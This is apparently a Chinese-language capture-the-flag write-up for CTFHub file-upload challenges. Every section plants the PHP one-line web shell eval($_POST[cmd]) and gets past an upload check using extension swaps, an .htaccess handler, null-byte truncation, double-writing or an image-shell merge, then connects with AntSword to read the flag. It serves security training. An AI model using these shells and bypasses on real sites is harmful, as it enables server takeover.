目录
无验证
开启题目
1.php 一句话木马内容:
<?php @eval($_POST[cmd]);?>
上传一句话木马,发现上传成功
蚁剑连接
http://challenge-8b27d18368ecc25c.sandbox.ctfhub.com:10800/upload/1.php
在 “/var/www/html/flag_1791214435.php”发现了 flag
前端验证
开启题目
上传一个 1.jpg,内容是
<?php @eval($_POST[cmd]);?>
上传抓包,修改后缀为 php
放包,上传成功
蚁剑连接
http://challenge-3c592a81e5b9e7a6.sandbox.ctfhub.com:10800/upload/1.php
在“/var/www/html/flag_333327672.php”发现了 flag
.htaccess
开启题目
.htaccess 文件内容:
<FilesMatch "jpg">
SetHandler application/x-httpd-php
</FilesMatch>
1.jpg内容:
<?php @eval($_POST[cmd]);?>
先上传 .htaccess 文件,再上传 1.jpg 一句话木马
蚁剑连接
在“/var/www/html/flag_121311308.php”发现了 flag
MIME 绕过
开启题目
1.jpg内容:
<?php @eval($_POST[cmd]);?>
上传 1.jpg 一句话木马,抓包,修改后缀为 php
然后放包,上传成功
蚁剑连接
在“/var/www/html/flag_763422378.php”找到了 flag
00 截断
开启题目
查看页面源代码,发现接受值是 get
1.php内容:
<?php @eval($_POST[cmd]);?>
上传一句话木马 1.php,抓包,修改后缀为 jpg,添加 1.php%00
然后放包,上传成功
蚁剑连接
在“/var/www/html/flag_177321091.php”找到了 flag
双写绕过
开启题目
1.php内容:
<?php @eval($_POST[cmd]);?>
上传一句话木马 1.php,抓包,双写 php
然后放包,上传成功
蚁剑连接
在“/var/www/html/flag_484225427.php”找到了 flag
文件头检测
开启题目
1.php内容:
<?php @eval($_POST[cmd]);?>
截屏截一个很小很小的图片,保存为 png 格式,把 1.png 和 1.php 放在同一文件夹,在此目录打开 cmd, 使用以下命令把 1.png 和 1.php 合成为图片马
copy 1.png /b + 1.php /a shell.png
上传图片马 shell.png,抓包,修改后缀为 php
然后放包,上传成功
蚁剑连接
在“/var/www/html/flag_213312434.php”找到了 flag